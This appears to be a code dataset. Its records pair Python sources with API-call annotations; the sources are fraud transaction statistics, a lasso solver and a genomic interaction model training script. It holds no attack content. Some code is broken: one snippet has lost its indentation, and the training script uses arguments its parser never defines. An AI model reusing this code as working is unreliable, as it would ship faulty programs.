data_stats.loc['transactions'] = [d.shape[0] for d in datasets]
data_stats.loc['transactions/hour'] = [round(d['Local_Date'].apply(lambda x: x.hour).value_counts().sum()/24/366, 2) for d in datasets]
data_stats.loc['transactions/day'] = [round(d['Local_Date'].apply(lambda x: x.day).value_counts().sum() / 366, 2) for d in datasets]
data_stats.loc['transactions/week'] = [round(d['Local_Date'].apply(lambda x: x.week).value_counts().sum() / 52, 2) for d in datasets]
data_stats.loc['transactions/month'] = [round(d['Local_Date'].apply(lambda x: x.month).value_counts().sum() / 12, 2) for d in datasets]
data_stats.loc['cards'] = [len(d["CardID"].unique()) for d in datasets]
data_stats.loc['cards, single use'] = [sum(d["CardID"].value_counts() == 1) for d in datasets]
data_stats.loc['cards, multi use'] = [sum(d["CardID"].value_counts() > 1) for d in datasets]
cards_genuine = datasets[1]['CardID'].unique()
cards_fraud = datasets[2]['CardID'].unique()
data_stats.loc['fraud cards in genuine'] = ['-', '-', len(np.intersect1d(cards_genuine, cards_fraud)) / len(cards_fraud)]
data_stats.loc['first transaction'] = [min(d["Global_Date"]).date() for d in datasets]
data_stats.loc['last transaction'] = [max(d["Global_Date"]).date() for d in datasets]
data_stats.loc['min amount'] = [min(d["Amount"]) for d in datasets]
data_stats.loc['max amount'] = [max(d["Amount"]) for d in datasets]
data_stats.loc['avg amount'] = [np.average(d["Amount"]) for d in datasets]
data_stats.loc['num merchants'] = [len(d["MerchantID"].unique()) for d in datasets]
data_stats.loc['countries'] = [len(d["Country"].unique()) for d in datasets]
data_stats.loc['currencies'] = [len(d["Currency"].unique()) for d in datasets]
data_stats.loc['min trans/card'] = [min(d["CardID"].value_counts()) for d in datasets]
data_stats.loc['max trans/card'] = [max(d["CardID"].value_counts()) for d in datasets]
data_stats.loc['avg trans/card'] = [np.average(d["CardID"].value_counts()) for d in datasets]
return data_stats
def get_grouped_prob(group_by, col_name):
grouped_prob = get_dataset()[0].groupby([group_by, col_name]).size()
grouped_prob = grouped_prob.groupby(level=0).apply(lambda x: x / sum(x))
return grouped_prob
def get_transaction_dist(col_name):
""" calculate fractions of transactions for given column """
possible_vals = get_dataset()[0][col_name].value_counts().unique()
trans_count = pd.DataFrame(0, index=possible_vals, columns=['all', 'non-fraud', 'fraud'])
trans_count['all'] = get_dataset()[0][col_name].value_counts().value_counts()
trans_count['non-fraud'] = get_dataset()[1][col_name].value_counts().value_counts()
trans_count['fraud'] = get_dataset()[1][col_name].value_counts().value_counts()
trans_count = trans_count.fillna(0)
trans_count /= np.sum(trans_count.values, axis=0)
# save
trans_count.to_csv(join(FOLDER_SIMULATOR_INPUT, 'fract-dist.csv'.format(col_name)), index_label=False)
# print
print(col_name)
print(trans_count)
print("")
return trans_count
def plot_hist_num_transactions(trans_frac, col_name):
""" method to plot histogram of number of transactions for a column """
plt.figure(figsize=(10, 7))
for i in range(3):
plt.subplot(3, 1, i+1)
plt.bar(range(trans_frac.shape[0]), trans_frac.values[:, i], label=trans_frac.index[i])
plt.ylabel('num transactions')
if i == 2:
plt.xlabel(col_name)
plt.savefig(join(FOLDER_SIMULATOR_INPUT, '{}_num-trans_hist'.format(col_name)))
plt.close()
def plot_bar_trans_prob(trans_frac, col_name, file_name=None):
""" method to plot bar plot of number of transactions for a column """
plt.figure()
bottoms = np.vstack((np.zeros(3), np.cumsum(trans_frac, axis=0)))
for i in range(trans_frac.shape[0]):
plt.bar((0, 1, 2), trans_frac.values[i], label=trans_frac.index[i], bottom=bottoms[i])
plt.xticks([0, 1, 2], ['all', 'non-fraud', 'fraud'])
h = plt.ylabel('%')
h.set_rotation(0)
plt.title("{} Distribution".format(col_name))
plt.legend()
if not file_name:
file_name = col_name
plt.savefig(join(FOLDER_SIMULATOR_INPUT, '{}_num-trans_bar'.format(file_name)))
plt.close()
|
[
"numpy.sum",
"pandas.read_csv",
"matplotlib.pyplot.bar",
"matplotlib.pyplot.figure",
"os.path.join",
"pandas.DataFrame",
"matplotlib.pyplot.close",
"os.path.dirname",
"os.path.exists",
"numpy.cumsum",
"numpy.intersect1d",
"matplotlib.pyplot.xticks",
"numpy.average",
"matplotlib.pyplot.legend",
"pandas.to_datetime",
"matplotlib.pyplot.ylabel",
"matplotlib.pyplot.subplot",
"os.makedirs",
"numpy.zeros",
"matplotlib.pyplot.xlabel"
] |
[((298, 332), 'os.path.join', 'join', (['FOLDER_REAL_DATA', '"""analysis"""'], {}), "(FOLDER_REAL_DATA, 'analysis')\n", (302, 332), False, 'from os.path import join, dirname, exists\n'), ((357, 392), 'os.path.join', 'join', (['pardir', '"""experiments/results"""'], {}), "(pardir, 'experiments/results')\n", (361, 392), False, 'from os.path import join, dirname, exists\n'), ((631, 679), 'os.path.join', 'join', (['FOLDER_REAL_DATA', '"""anonymized_dataset.csv"""'], {}), "(FOLDER_REAL_DATA, 'anonymized_dataset.csv')\n", (635, 679), False, 'from os.path import join, dirname, exists\n'), ((696, 741), 'os.path.join', 'join', (['FOLDER_REAL_DATA', '"""transaction_log.csv"""'], {}), "(FOLDER_REAL_DATA, 'transaction_log.csv')\n", (700, 741), False, 'from os.path import join, dirname, exists\n'), ((763, 812), 'os.path.join', 'join', (['FOLDER_SIMULATOR_LOG', '"""transaction_log.csv"""'], {}), "(FOLDER_SIMULATOR_LOG, 'transaction_log.csv')\n", (767, 812), False, 'from os.path import join, dirname, exists\n'), ((170, 187), 'os.path.dirname', 'dirname', (['__file__'], {}), '(__file__)\n', (177, 187), False, 'from os.path import join, dirname, exists\n'), ((232, 249), 'os.path.dirname', 'dirname', (['__file__'], {}), '(__file__)\n', (239, 249), False, 'from os.path import join, dirname, exists\n'), ((1004, 1021), 'pandas.read_csv', 'pd.read_csv', (['file'], {}), '(file)\n', (1015, 1021), True, 'import pandas as pd\n'), ((1095, 1135), 'pandas.to_datetime', 'pd.to_datetime', (["dataset01['Global_Date']"], {}), "(dataset01['Global_Date'])\n", (1109, 1135), True, 'import pandas as pd\n'), ((1166, 1205), 'pandas.to_datetime', 'pd.to_datetime', (["dataset01['Local_Date']"], {}), "(dataset01['Local_Date'])\n", (1180, 1205), True, 'import pandas as pd\n'), ((1573, 1618), 'os.path.join', 'join', (['FOLDER_REAL_DATA', '"""transaction_log.csv"""'], {}), "(FOLDER_REAL_DATA, 'transaction_log.csv')\n", (1577, 1618), False, 'from os.path import join, dirname, exists\n'), ((2327, 2364), 'pandas.DataFrame', 'pd.DataFrame', ([], {'columns': 'data_stats_cols'}), '(columns=data_stats_cols)\n', (2339, 2364), True, 'import pandas as pd\n'), ((4864, 4939), 'pandas.DataFrame', 'pd.DataFrame', (['(0)'], {'index': 'possible_vals', 'columns': "['all', 'non-fraud', 'fraud']"}), "(0, index=possible_vals, columns=['all', 'non-fraud', 'fraud'])\n", (4876, 4939), True, 'import pandas as pd\n'), ((5253, 5287), 'numpy.sum', 'np.sum', (['trans_count.values'], {'axis': '(0)'}), '(trans_count.values, axis=0)\n', (5259, 5287), True, 'import numpy as np\n'), ((5637, 5664), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(10, 7)'}), '(figsize=(10, 7))\n', (5647, 5664), True, 'import matplotlib.pyplot as plt\n'), ((5994, 6005), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (6003, 6005), True, 'import matplotlib.pyplot as plt\n'), ((6150, 6162), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (6160, 6162), True, 'import matplotlib.pyplot as plt\n'), ((6373, 6425), 'matplotlib.pyplot.xticks', 'plt.xticks', (['[0, 1, 2]', "['all', 'non-fraud', 'fraud']"], {}), "([0, 1, 2], ['all', 'non-fraud', 'fraud'])\n", (6383, 6425), True, 'import matplotlib.pyplot as plt\n'), ((6434, 6449), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""%"""'], {}), "('%')\n", (6444, 6449), True, 'import matplotlib.pyplot as plt\n'), ((6526, 6538), 'matplotlib.pyplot.legend', 'plt.legend', ([], {}), '()\n', (6536, 6538), True, 'import matplotlib.pyplot as plt\n'), ((6678, 6689), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (6687, 6689), True, 'import matplotlib.pyplot as plt\n'), ((563, 577), 'os.path.exists', 'exists', (['folder'], {}), '(folder)\n', (569, 577), False, 'from os.path import join, dirname, exists\n'), ((587, 603), 'os.makedirs', 'makedirs', (['folder'], {}), '(folder)\n', (595, 603), False, 'from os import makedirs, pardir\n'), ((3853, 3876), 'numpy.average', 'np.average', (["d['Amount']"], {}), "(d['Amount'])\n", (3863, 3876), True, 'import numpy as np\n'), ((5696, 5720), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(3)', '(1)', '(i + 1)'], {}), '(3, 1, i + 1)\n', (5707, 5720), True, 'import matplotlib.pyplot as plt\n'), ((5823, 5853), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""num transactions"""'], {}), "('num transactions')\n", (5833, 5853), True, 'import matplotlib.pyplot as plt\n'), ((6282, 6373), 'matplotlib.pyplot.bar', 'plt.bar', (['(0, 1, 2)', 'trans_frac.values[i]'], {'label': 'trans_frac.index[i]', 'bottom': 'bottoms[i]'}), '((0, 1, 2), trans_frac.values[i], label=trans_frac.index[i], bottom=\n bottoms[i])\n', (6289, 6373), True, 'import matplotlib.pyplot as plt\n'), ((5885, 5905), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['col_name'], {}), '(col_name)\n', (5895, 5905), True, 'import matplotlib.pyplot as plt\n'), ((6188, 6199), 'numpy.zeros', 'np.zeros', (['(3)'], {}), '(3)\n', (6196, 6199), True, 'import numpy as np\n'), ((6201, 6230), 'numpy.cumsum', 'np.cumsum', (['trans_frac'], {'axis': '(0)'}), '(trans_frac, axis=0)\n', (6210, 6230), True, 'import numpy as np\n'), ((3426, 3468), 'numpy.intersect1d', 'np.intersect1d', (['cards_genuine', 'cards_fraud'], {}), '(cards_genuine, cards_fraud)\n', (3440, 3468), True, 'import numpy as np\n')]
|
import numpy as np
from numpy import linalg as la
import invprob.sparse as sparse
def fb_lasso(A, y, reg_param, iter_nb, x_ini=None, inertia=False, verbose=False):
''' Use the Forward-Backward algorithm to find a minimizer of:
reg_param*norm(x,1) + 0.5*norm(Ax-y,2)**2
Eventually outputs the functional values and support of the iterates
while running the method
reg_param is either a number, in which case we use it all along the iterations
or a sequence of size iter_nb
'''
# Manage optional input/output
if verbose: # Optional output
regret = np.zeros(iter_nb)
sparsity = np.zeros(iter_nb)
support = []
path = np.zeros((A.shape[1], iter_nb))
if x_ini is not None: # Optional initialization
x = x_ini
else:
x = np.zeros((A.shape[1], 1))
if isinstance(reg_param, (int, float)): # Fixed or not parameter
param = reg_param * np.ones(iter_nb)
else:
param = reg_param
if inertia:
alpha = [k/(k+3) for k in np.arange(iter_nb)] # asymptotically equivalent to Nesterov
else:
alpha = np.zeros(iter_nb) # no inertia
# The core of the algorithm
stepsize = 0.5 * 2 / (la.norm(A, 2)**2)
T = A.T@A
ATy = A.T@y
gradient = lambda x: x - stepsize*(T@x - ATy)
forward_backward = lambda x, param: sparse.soft_thresholding(gradient(x), param*stepsize)
x_old = x
for k in range(iter_nb):
if verbose:
regret[k] = 0.5 * la.norm(A@x - y, 2)**2 + param[k] * la.norm(x, 1)
support.append( tuple(np.where(np.abs(x) > 1e-15)[0]) )
sparsity[k] = len(support[k])
path[:, k] = x.reshape((x.shape[0]))
x, x_old = forward_backward( (1+alpha[k])*x - alpha[k]*x_old, param[k] ), x
# Output
if verbose:
details = {
"function_value": regret,
"iterate_support": support,
"iterate_sparsity": sparsity,
"iterate_path": path
}
return x, details
else:
return x
|
[
"numpy.abs",
"numpy.zeros",
"numpy.ones",
"numpy.arange",
"numpy.linalg.norm"
] |
[((628, 645), 'numpy.zeros', 'np.zeros', (['iter_nb'], {}), '(iter_nb)\n', (636, 645), True, 'import numpy as np\n'), ((665, 682), 'numpy.zeros', 'np.zeros', (['iter_nb'], {}), '(iter_nb)\n', (673, 682), True, 'import numpy as np\n'), ((719, 750), 'numpy.zeros', 'np.zeros', (['(A.shape[1], iter_nb)'], {}), '((A.shape[1], iter_nb))\n', (727, 750), True, 'import numpy as np\n'), ((844, 869), 'numpy.zeros', 'np.zeros', (['(A.shape[1], 1)'], {}), '((A.shape[1], 1))\n', (852, 869), True, 'import numpy as np\n'), ((1157, 1174), 'numpy.zeros', 'np.zeros', (['iter_nb'], {}), '(iter_nb)\n', (1165, 1174), True, 'import numpy as np\n'), ((968, 984), 'numpy.ones', 'np.ones', (['iter_nb'], {}), '(iter_nb)\n', (975, 984), True, 'import numpy as np\n'), ((1247, 1260), 'numpy.linalg.norm', 'la.norm', (['A', '(2)'], {}), '(A, 2)\n', (1254, 1260), True, 'from numpy import linalg as la\n'), ((1071, 1089), 'numpy.arange', 'np.arange', (['iter_nb'], {}), '(iter_nb)\n', (1080, 1089), True, 'import numpy as np\n'), ((1568, 1581), 'numpy.linalg.norm', 'la.norm', (['x', '(1)'], {}), '(x, 1)\n', (1575, 1581), True, 'from numpy import linalg as la\n'), ((1532, 1553), 'numpy.linalg.norm', 'la.norm', (['(A @ x - y)', '(2)'], {}), '(A @ x - y, 2)\n', (1539, 1553), True, 'from numpy import linalg as la\n'), ((1625, 1634), 'numpy.abs', 'np.abs', (['x'], {}), '(x)\n', (1631, 1634), True, 'import numpy as np\n')]
|
#!/usr/bin/env python3
import argparse, os, sys, time, shutil, tqdm
import warnings, json, gzip
import numpy as np
import copy
from sklearn.model_selection import GroupKFold
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
from torch.utils.data import DataLoader, Subset
import epi_models
import epi_dataset
import misc_utils
import functools
print = functools.partial(print, flush=True)
def split_train_valid_test(groups, train_keys, valid_keys, test_keys=None):
"""
groups: length N, the number of samples
train
"""
assert isinstance(train_keys, list)
assert isinstance(valid_keys, list)
assert test_keys is None or isinstance(test_keys, list)
index = np.arange(len(groups))
train_idx = index[np.isin(groups, train_keys)]
valid_idx = index[np.isin(groups, valid_keys)]
if test_keys is not None:
test_idx = index[np.isin(groups, test_keys)]
return train_idx, valid_idx, test_idx
else:
return train_idx, valid_idx
def make_directory(in_dir):
if os.path.isfile(in_dir):
warnings.warn("{} is a regular file".format(in_dir))
return None
outdir = in_dir.rstrip('/')
if not os.path.isdir(outdir):
os.makedirs(outdir)
return outdir
def model_summary(model):
"""
model: pytorch model
"""
import torch
total_param = 0
trainable_param = 0
for i, p in enumerate(model.parameters()):
num_p = torch.numel(p)
if p.requires_grad:
trainable_param += num_p
total_param += num_p
return {'total_param': total_param, 'trainable_param': trainable_param}
def predict(model: nn.Module, data_loader: DataLoader, device=torch.device('cuda')):
model.eval()
result, true_label = None, None
for feats, _, enh_idxs, prom_idxs, labels in data_loader:
feats, labels = feats.to(device), labels.to(device)
# enh_idxs, prom_idxs = enh_idxs.to(device), prom_idxs.to(device)
pred = model(feats, enh_idx=enh_idxs, prom_idx=prom_idxs)
pred = pred.detach().cpu().numpy()
labels = labels.detach().cpu().numpy()
if result is None:
result = pred
true_label = labels
else:
result = np.concatenate((result, pred), axis=0)
true_label = np.concatenate((true_label, labels), axis=0)
return (result.squeeze(), true_label.squeeze())
def train_validate_test(
model, optimizer,
train_loader, valid_loader, test_loader,
num_epoch, patience, outdir,
checkpoint_prefix, device, use_scheduler=False) -> nn.Module:
bce_loss = nn.BCELoss()
mse_loss = nn.MSELoss()
wait = 0
best_epoch, best_val_auc, best_val_aupr = -1, -1, -1
if use_scheduler:
scheduler = torch.optim.lr_scheduler.CosineAnnealingWarmRestarts(optimizer, T_0=5, T_mult=2)
for epoch_idx in range(num_epoch):
model.train()
for feats, dists, enh_idxs, prom_idxs, labels in tqdm.tqdm(train_loader):
feats, dists, labels = feats.to(device), dists.to(device), labels.to(device)
if hasattr(model, "att_C"):
pred, pred_dists, att = model(feats, enh_idxs, prom_idxs, return_att=True)
attT = att.transpose(1, 2)
identity = torch.eye(att.size(1)).to(device)
identity = Variable(identity.unsqueeze(0).expand(labels.size(0), att.size(1), att.size(1)))
penal = model.l2_matrix_norm(torch.matmul(att, attT) - identity)
loss = bce_loss(pred, labels) + (model.att_C * penal / labels.size(0)).type(torch.cuda.FloatTensor) + mse_loss(dists, pred_dists)
del penal, identity
else:
pred = model(feats, dists)
loss = bce_loss(pred, labels)
optimizer.zero_grad()
loss.backward()
optimizer.step()
if use_scheduler:
scheduler.step()
model.eval()
valid_pred, valid_true = predict(model, valid_loader)
val_AUC, val_AUPR = misc_utils.evaluator(valid_true, valid_pred, out_keys=["AUC", "AUPR"])
print("\nvalid_result({})\t{:.4f}\t{:.4f}\t({})".format(epoch_idx, val_AUC, val_AUPR, time.asctime()))
if val_AUC + val_AUPR > best_val_auc + best_val_aupr:
wait = 0
best_epoch, best_val_auc, best_val_aupr = epoch_idx, val_AUC, val_AUPR
test_pred, test_true = predict(model, test_loader)
np.savetxt(
"{}/test_result.{}.txt.gz".format(outdir, epoch_idx),
X=np.concatenate((test_pred.reshape(-1, 1), test_true.reshape(-1, 1)), axis=1),
fmt="%.5f",
delimiter='\t'
)
test_AUC, test_AUPR = misc_utils.evaluator(test_true, test_pred, out_keys=["AUC", "AUPR"])
print("Test_result\t{:.4f}\t{:.4f}\t({})".format(test_AUC, test_AUPR, time.asctime()))
if use_scheduler:
torch.save({
"model_state_dict": model.state_dict(),
"optimizer_state_dict": optimizer.state_dict(),
"scheduler_state_dict": scheduler.state_dict()
}, "{}/checkpoint.{}.pt".format(outdir, epoch_idx))
else:
torch.save({
"model_state_dict": model.state_dict(),
"optimizer_state_dict": optimizer.state_dict()
}, "{}/checkpoint.{}.pt".format(outdir, epoch_idx))
else:
wait += 1
if wait >= patience:
print("Early stopped ({})".format(time.asctime()))
print("Best epoch/AUC/AUPR: {}\t{:.4f}\t{:.4f}".format(best_epoch, best_val_auc, best_val_aupr))
break
else:
print("Wait{} ({})".format(wait, time.asctime()))
def get_args():
p = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
p.add_argument(
'--train',
required=True,
nargs='+'
)
p.add_argument(
'--valid',
required=True,
nargs='+'
)
p.add_argument(
"--test",
nargs='+',
default=None,
help="Optional test set"
)
p.add_argument('-b', "--batch-size", type=int, default=256)
p.add_argument('-c', "--config", required=True)
p.add_argument('-o', "--outdir", required=True)
p.add_argument("--threads", default=32, type=int)
p.add_argument('--seed', type=int, default=2020)
return p
if __name__ == "__main__":
p = get_args()
args = p.parse_args()
np.random.seed(args.seed)
torch.manual_seed(args.seed)
config = json.load(open(args.config))
# all_data = epi_dataset.EPIDataset(**config["data_opts"])
train_config = config.copy()
train_config["data_opts"]["datasets"] = args.train
train_config["data_opts"]["use_reverse"] = args.use_reverse
train_config["data_opts"]["max_aug"] = args.aug_num
train_data = epi_dataset.EPIDataset(
**train_config["data_opts"]
)
train_loader = DataLoader(train_data, batch_size=args.batch_size, shuffle=True, num_workers=args.threads)
if args.test is None:
valid_test_config = copy.deepcopy(config)
valid_test_config["data_opts"]["datasets"] = args.valid
valid_test_data = epi_dataset.EPIDataset(
**valid_test_config["data_opts"]
)
valid_idx, test_idx = split_train_valid_test(
np.array(valid_test_data.metainfo["chrom"]),
train_keys=["chr{}".format(i).replace("23", "X") for i in range(1, 24, 2)],
valid_keys=["chr{}".format(i) for i in range(2, 22, 2)]
)
valid_data = Subset(valid_test_data, indices=valid_idx)
test_data = Subset(valid_test_data, indices=test_idx)
valid_loader = DataLoader(valid_data, batch_size=args.batch_size, shuffle=False)
test_loader = DataLoader(test_data, batch_size=args.batch_size, shuffle=False)
else:
valid_config = copy.deepcopy(config)
valid_config["data_opts"]["datasets"] = args.valid
valid_data = epi_dataset.EPIDataset(
**valid_config["data_opts"]
)
valid_loader = DataLoader(valid_data, batch_size=args.batch_size, shuffle=False, num_workers=args.threads)
test_config = copy.deepcopy(config)
test_config["data_opts"]["datasets"] = args.test
test_data = epi_dataset.EPIDataset(
**test_config["data_opts"]
)
test_loader = DataLoader(test_data, batch_size=args.batch_size, shuffle=False, num_workers=args.threads)
config["model_opts"]["in_dim"] = train_data.feat_dim
config["model_opts"]["seq_len"] = config["data_opts"]["seq_len"] // config["data_opts"]["bin_size"]
print("##{}".format(time.asctime()))
print("##command: {}".format(' '.join(sys.argv)))
print("##args: {}".format(args))
print("##config: {}".format(config))
print("##sample size: {}".format(len(train_data)))
print("## feature size: {}".format([v.size() for v in train_data.__getitem__(0)]))
if args.gpu == -1:
device = "cpu"
else:
os.environ["CUDA_VISIBLE_DEVICES"] = str(args.gpu_id)
device = "cuda"
device = torch.device(device)
model_class = getattr(epi_models, config["model_opts"]["model"])
model = model_class(**config["model_opts"]).to(device)
optimizer_params = {'lr': config["train_opts"]["learning_rate"], 'weight_decay': 0}
optimizer = torch.optim.Adam(model.parameters(), **optimizer_params)
print(model)
print(model_summary(model))
print(optimizer)
if not os.path.isdir(args.outdir):
args.outdir = make_directory(args.outdir)
train_validate_test(
model,
optimizer,
train_loader, valid_loader, test_loader,
num_epoch=config["train_opts"]["num_epoch"],
patience=config["train_opts"]["patience"],
outdir=args.outdir,
checkpoint_prefix="checkpoint",
device=device,
use_scheduler=config["train_opts"]["use_scheduler"]
)
|
[
"numpy.isin",
"numpy.random.seed",
"argparse.ArgumentParser",
"misc_utils.evaluator",
"os.path.isfile",
"torch.device",
"time.asctime",
"torch.nn.MSELoss",
"torch.nn.BCELoss",
"torch.utils.data.DataLoader",
"torch.matmul",
"functools.partial",
"copy.deepcopy",
"tqdm.tqdm",
"torch.manual_seed",
"numpy.concatenate",
"torch.utils.data.Subset",
"torch.numel",
"os.makedirs",
"os.path.isdir",
"torch.optim.lr_scheduler.CosineAnnealingWarmRestarts",
"epi_dataset.EPIDataset",
"numpy.array"
] |
[((409, 445), 'functools.partial', 'functools.partial', (['print'], {'flush': '(True)'}), '(print, flush=True)\n', (426, 445), False, 'import functools\n'), ((1081, 1103), 'os.path.isfile', 'os.path.isfile', (['in_dir'], {}), '(in_dir)\n', (1095, 1103), False, 'import argparse, os, sys, time, shutil, tqdm\n'), ((1739, 1759), 'torch.device', 'torch.device', (['"""cuda"""'], {}), "('cuda')\n", (1751, 1759), False, 'import torch\n'), ((2675, 2687), 'torch.nn.BCELoss', 'nn.BCELoss', ([], {}), '()\n', (2685, 2687), True, 'import torch.nn as nn\n'), ((2703, 2715), 'torch.nn.MSELoss', 'nn.MSELoss', ([], {}), '()\n', (2713, 2715), True, 'import torch.nn as nn\n'), ((5975, 6054), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'formatter_class': 'argparse.ArgumentDefaultsHelpFormatter'}), '(formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n', (5998, 6054), False, 'import argparse, os, sys, time, shutil, tqdm\n'), ((6773, 6798), 'numpy.random.seed', 'np.random.seed', (['args.seed'], {}), '(args.seed)\n', (6787, 6798), True, 'import numpy as np\n'), ((6803, 6831), 'torch.manual_seed', 'torch.manual_seed', (['args.seed'], {}), '(args.seed)\n', (6820, 6831), False, 'import torch\n'), ((7164, 7215), 'epi_dataset.EPIDataset', 'epi_dataset.EPIDataset', ([], {}), "(**train_config['data_opts'])\n", (7186, 7215), False, 'import epi_dataset\n'), ((7249, 7343), 'torch.utils.data.DataLoader', 'DataLoader', (['train_data'], {'batch_size': 'args.batch_size', 'shuffle': '(True)', 'num_workers': 'args.threads'}), '(train_data, batch_size=args.batch_size, shuffle=True,\n num_workers=args.threads)\n', (7259, 7343), False, 'from torch.utils.data import DataLoader, Subset\n'), ((9448, 9468), 'torch.device', 'torch.device', (['device'], {}), '(device)\n', (9460, 9468), False, 'import torch\n'), ((790, 817), 'numpy.isin', 'np.isin', (['groups', 'train_keys'], {}), '(groups, train_keys)\n', (797, 817), True, 'import numpy as np\n'), ((841, 868), 'numpy.isin', 'np.isin', (['groups', 'valid_keys'], {}), '(groups, valid_keys)\n', (848, 868), True, 'import numpy as np\n'), ((1229, 1250), 'os.path.isdir', 'os.path.isdir', (['outdir'], {}), '(outdir)\n', (1242, 1250), False, 'import argparse, os, sys, time, shutil, tqdm\n'), ((1260, 1279), 'os.makedirs', 'os.makedirs', (['outdir'], {}), '(outdir)\n', (1271, 1279), False, 'import argparse, os, sys, time, shutil, tqdm\n'), ((1490, 1504), 'torch.numel', 'torch.numel', (['p'], {}), '(p)\n', (1501, 1504), False, 'import torch\n'), ((2830, 2915), 'torch.optim.lr_scheduler.CosineAnnealingWarmRestarts', 'torch.optim.lr_scheduler.CosineAnnealingWarmRestarts', (['optimizer'], {'T_0': '(5)', 'T_mult': '(2)'}), '(optimizer, T_0=5, T_mult=2\n )\n', (2882, 2915), False, 'import torch\n'), ((3030, 3053), 'tqdm.tqdm', 'tqdm.tqdm', (['train_loader'], {}), '(train_loader)\n', (3039, 3053), False, 'import argparse, os, sys, time, shutil, tqdm\n'), ((4125, 4195), 'misc_utils.evaluator', 'misc_utils.evaluator', (['valid_true', 'valid_pred'], {'out_keys': "['AUC', 'AUPR']"}), "(valid_true, valid_pred, out_keys=['AUC', 'AUPR'])\n", (4145, 4195), False, 'import misc_utils\n'), ((7395, 7416), 'copy.deepcopy', 'copy.deepcopy', (['config'], {}), '(config)\n', (7408, 7416), False, 'import copy\n'), ((7507, 7563), 'epi_dataset.EPIDataset', 'epi_dataset.EPIDataset', ([], {}), "(**valid_test_config['data_opts'])\n", (7529, 7563), False, 'import epi_dataset\n'), ((7901, 7943), 'torch.utils.data.Subset', 'Subset', (['valid_test_data'], {'indices': 'valid_idx'}), '(valid_test_data, indices=valid_idx)\n', (7907, 7943), False, 'from torch.utils.data import DataLoader, Subset\n'), ((7964, 8005), 'torch.utils.data.Subset', 'Subset', (['valid_test_data'], {'indices': 'test_idx'}), '(valid_test_data, indices=test_idx)\n', (7970, 8005), False, 'from torch.utils.data import DataLoader, Subset\n'), ((8029, 8094), 'torch.utils.data.DataLoader', 'DataLoader', (['valid_data'], {'batch_size': 'args.batch_size', 'shuffle': '(False)'}), '(valid_data, batch_size=args.batch_size, shuffle=False)\n', (8039, 8094), False, 'from torch.utils.data import DataLoader, Subset\n'), ((8117, 8181), 'torch.utils.data.DataLoader', 'DataLoader', (['test_data'], {'batch_size': 'args.batch_size', 'shuffle': '(False)'}), '(test_data, batch_size=args.batch_size, shuffle=False)\n', (8127, 8181), False, 'from torch.utils.data import DataLoader, Subset\n'), ((8215, 8236), 'copy.deepcopy', 'copy.deepcopy', (['config'], {}), '(config)\n', (8228, 8236), False, 'import copy\n'), ((8317, 8368), 'epi_dataset.EPIDataset', 'epi_dataset.EPIDataset', ([], {}), "(**valid_config['data_opts'])\n", (8339, 8368), False, 'import epi_dataset\n'), ((8414, 8509), 'torch.utils.data.DataLoader', 'DataLoader', (['valid_data'], {'batch_size': 'args.batch_size', 'shuffle': '(False)', 'num_workers': 'args.threads'}), '(valid_data, batch_size=args.batch_size, shuffle=False,\n num_workers=args.threads)\n', (8424, 8509), False, 'from torch.utils.data import DataLoader, Subset\n'), ((8529, 8550), 'copy.deepcopy', 'copy.deepcopy', (['config'], {}), '(config)\n', (8542, 8550), False, 'import copy\n'), ((8628, 8678), 'epi_dataset.EPIDataset', 'epi_dataset.EPIDataset', ([], {}), "(**test_config['data_opts'])\n", (8650, 8678), False, 'import epi_dataset\n'), ((8723, 8817), 'torch.utils.data.DataLoader', 'DataLoader', (['test_data'], {'batch_size': 'args.batch_size', 'shuffle': '(False)', 'num_workers': 'args.threads'}), '(test_data, batch_size=args.batch_size, shuffle=False,\n num_workers=args.threads)\n', (8733, 8817), False, 'from torch.utils.data import DataLoader, Subset\n'), ((9843, 9869), 'os.path.isdir', 'os.path.isdir', (['args.outdir'], {}), '(args.outdir)\n', (9856, 9869), False, 'import argparse, os, sys, time, shutil, tqdm\n'), ((925, 951), 'numpy.isin', 'np.isin', (['groups', 'test_keys'], {}), '(groups, test_keys)\n', (932, 951), True, 'import numpy as np\n'), ((2287, 2325), 'numpy.concatenate', 'np.concatenate', (['(result, pred)'], {'axis': '(0)'}), '((result, pred), axis=0)\n', (2301, 2325), True, 'import numpy as np\n'), ((2351, 2395), 'numpy.concatenate', 'np.concatenate', (['(true_label, labels)'], {'axis': '(0)'}), '((true_label, labels), axis=0)\n', (2365, 2395), True, 'import numpy as np\n'), ((4854, 4922), 'misc_utils.evaluator', 'misc_utils.evaluator', (['test_true', 'test_pred'], {'out_keys': "['AUC', 'AUPR']"}), "(test_true, test_pred, out_keys=['AUC', 'AUPR'])\n", (4874, 4922), False, 'import misc_utils\n'), ((7656, 7699), 'numpy.array', 'np.array', (["valid_test_data.metainfo['chrom']"], {}), "(valid_test_data.metainfo['chrom'])\n", (7664, 7699), True, 'import numpy as np\n'), ((9001, 9015), 'time.asctime', 'time.asctime', ([], {}), '()\n', (9013, 9015), False, 'import argparse, os, sys, time, shutil, tqdm\n'), ((4290, 4304), 'time.asctime', 'time.asctime', ([], {}), '()\n', (4302, 4304), False, 'import argparse, os, sys, time, shutil, tqdm\n'), ((5005, 5019), 'time.asctime', 'time.asctime', ([], {}), '()\n', (5017, 5019), False, 'import argparse, os, sys, time, shutil, tqdm\n'), ((3532, 3555), 'torch.matmul', 'torch.matmul', (['att', 'attT'], {}), '(att, attT)\n', (3544, 3555), False, 'import torch\n'), ((5713, 5727), 'time.asctime', 'time.asctime', ([], {}), '()\n', (5725, 5727), False, 'import argparse, os, sys, time, shutil, tqdm\n'), ((5932, 5946), 'time.asctime', 'time.asctime', ([], {}), '()\n', (5944, 5946), False, 'import argparse, os, sys, time, shutil, tqdm\n')]
|
""" TensorMONK :: layers :: Activations """
__all__ = ["Activations"]
import torch
import torch.nn as nn
import torch.nn.functional as F
def maxout(tensor: torch.Tensor) -> torch.Tensor:
